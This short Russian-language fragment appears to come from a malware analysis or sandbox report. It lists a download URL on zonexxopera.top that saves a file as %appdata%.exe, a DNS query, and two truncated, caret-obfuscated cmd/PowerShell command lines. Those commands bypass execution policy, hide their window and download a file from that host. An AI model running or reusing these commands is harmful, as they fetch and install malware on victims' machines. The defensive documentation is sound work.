Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOw^ErSh^ElL.eXe^ -EX^E^Cu^t^Io^np^oliCy b^yp^a^S^S^ -^nopROFil^E -^windoW^STYLE^ H^IDD^en (^nEW-o^b^JECT syS^Te^M^.Ne^T.WEbc^L^iEnT).dowNlO^aD^fi^LE^('http://zonexxopera.to...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "pOw^ErSh^ElL.eXe^ -EX^E^Cu^t^Io^np^oliCy b^yp^a^S^S^ -^nopROFil^E -^windoW^STYLE^ H^IDD^en (^nEW-o^b^JECT syS^Te^M^.Ne^T.WEbc^L^iEnT).dowNlO^aD^fi^LE^('http://zonexxopera.to...' (со скрытым окном)